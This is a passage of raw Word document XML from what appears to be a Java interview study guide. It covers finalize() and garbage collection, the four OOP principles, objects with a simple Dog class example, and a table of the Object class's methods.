          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> it will be called.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5190B19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lead to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resource leaks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if relied on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F961C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lternatives</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or explicitly close resources via close().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1C365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7CF878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F5D3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9F9290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al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6F397"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nalize called!"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDBB4B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151B6"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t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D987C8B"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EEE0F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3A8442"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0A7D9"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6421C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2717383"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51B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ggests GC, not guaranteed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0470AD4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B34CE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ends."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069B611E"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88DC1" w14:textId="42D1ABC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5B1F0CE9"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put may or may not show "Finalize called!" — because GC behavior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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AB6DBB" w14:textId="67BDD3F3" w:rsidR="002E7005" w:rsidRPr="00CE4B9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5" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r w:rsidR="002E7005" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="296725AB" w14:textId="0D9173A3" w:rsidR="00884A56" w:rsidRPr="00CE4B95" w:rsidRDefault="00884A56" w:rsidP="00884A56">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="106" w:name="_Toc197867320"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>OOPs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="106"/>
    </w:p>
    <w:p w14:paraId="2BACE634" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="107" w:name="_Toc197867321"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain OOPs concept?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="107"/>
    </w:p>
    <w:p w14:paraId="23083475" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="002465FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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CE4B95" w:rsidRDefault="00C55850" w:rsidP="002465FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D90F42F" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="002465FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Abstraction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF485E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Hides internal implementation and shows only functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC24FD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bstract classes</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interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487E42F9"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Encapsulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDC3010"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Bundling of data (variables) and methods into a single unit (class).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502C94F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ccess modifiers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (private, public, protected).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595C1961"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Inheritance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4680EB"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Allows a class (child) to inherit fields and methods from another class (parent).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CC99AD"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Promotes code reusability and method overriding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483067AD"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Polymorphism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04062BEC"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One entity behaves differently based on context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCFA890" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="002465FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Compile-time (method overloading)</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Run-time (method overriding)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are the two types.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E0594B" w14:textId="2BE9A200" w:rsidR="003F6A1C" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="002465FD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="2FB0C7B1">
          <v:rect id="_x0000_i1296" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6882A67A"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8" w:name="_Toc197867322"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is an object?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="108"/>
    </w:p>
    <w:p w14:paraId="7F5C7DE8" w14:textId="34E19437" w:rsidR="00865911" w:rsidRPr="00CE4B95" w:rsidRDefault="00865911"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n object</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>instance of a class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5724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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>real-world entity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that has:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1A1B1D"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attributes/fields):</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> e.g., name, age</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308EE487"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 (methods/functions):</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> e.g., walk(), sleep()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E1E356" w14:textId="77777777" w:rsidR="00865911" w:rsidRPr="00CE4B95" w:rsidRDefault="00865911"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DB41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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E66A46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2BE290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4381BE6" w14:textId="77777777" w:rsidR="00865911" w:rsidRPr="00CE4B95" w:rsidRDefault="00865911" w:rsidP="0086711B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37932F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2484DAE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17CE09A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547D8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601FDA" w14:textId="77777777" w:rsidR="00865911" w:rsidRPr="00CE4B95" w:rsidRDefault="00865911" w:rsidP="0086711B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CB29B1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4208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291298B"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1 = new Dog(); // Object created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F3AA6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name = "Bruno";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDD74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age = 3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBDFF97"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bark(); // Bruno is barking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D03349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9FC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BDA2D"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d1 is an </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the class Dog. It holds its own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name, age) and can perform actions (</w:t>
      </w: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xml:space="preserve"> like bark()).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595DBE1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object memory structure, how it's stored in heap, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5416F8E1" w14:textId="6D93691F"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5F470AC">
          <v:rect id="_x0000_i1297" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FFE7F8"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9" w:name="_Toc197867323"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain method in Object class? Explain 9 methods in Object class?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="109"/>
    </w:p>
    <w:p w14:paraId="754411F7" w14:textId="577DEB9A" w:rsidR="004D466D" w:rsidRPr="00CE4B95" w:rsidRDefault="004D466D" w:rsidP="005E76D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Object class is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parent class of all classes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Every class in Java </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>implicitly inherits</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from it, unless it explicitly extends another class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F72344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class is defined in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>java.lang</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> package and provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>several important methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that every Java object inherits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144F089C"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Object class methods are important?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370A018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llow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EA062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mparing objects (equals)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFB5CD6"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hash codes (hashCode)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2566F1"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class info (getClass)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EB064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bject to String (toString)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5D1D74"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communication (wait, notify, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3F9315"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298" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FA38FD"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CE4B95" w14:paraId="5114D0DD" w14:textId="77777777" w:rsidTr="004D466D">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="156909C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5E76DA" w:rsidRPr="00CE4B95" w14:paraId="0AF3561A" w14:textId="77777777" w:rsidTr="004D466D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="269D95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CE4B95" w14:paraId="6B9E0B99" w14:textId="77777777" w:rsidTr="004D466D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="343AE921"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hash code value for the object. Used in hashing collections like HashMap, HashSet.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E76DA" w:rsidRPr="00CE4B95" w14:paraId="27269FA0" w14:textId="77777777" w:rsidTr="004D466D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="292FEF7C"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string representation of the object. Default: ClassName@HashCode. Commonly overridden.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E76DA" w:rsidRPr="00CE4B95" w14:paraId="5F3E0716" w14:textId="77777777" w:rsidTr="004D466D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FC694B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runtime class of the object (Class object).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E76DA" w:rsidRPr="00CE4B95" w14:paraId="25F9447B" w14:textId="77777777" w:rsidTr="004D466D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69A2C05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s and returns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clone) of the object. Requires Cloneable interface and overridden clone() method.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E76DA" w:rsidRPr="00CE4B95" w14:paraId="734C2FD4" w14:textId="77777777" w:rsidTr="004D466D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66C4F1B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lled by the Garbage Collector </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>before object destruction</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>. Rarely used. Deprecated in Java 9.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E76DA" w:rsidRPr="00CE4B95" w14:paraId="1ABA8289" w14:textId="77777777" w:rsidTr="004D466D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CD3BD0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s the current thread to wait until another thread invokes notify() or notifyAll().</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E76DA" w:rsidRPr="00CE4B95" w14:paraId="71E03597" w14:textId="77777777" w:rsidTr="004D466D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="002E7B3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akes up a single thread that's waiting on the object's monitor.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E76DA" w:rsidRPr="00CE4B95" w14:paraId="0F811538" w14:textId="77777777" w:rsidTr="004D466D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4174DC6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akes up </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>all</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> threads waiting on the object's monitor.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6617CEFF"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299" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6CFBAE"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w:t>
      </w:r>
    </w:p>
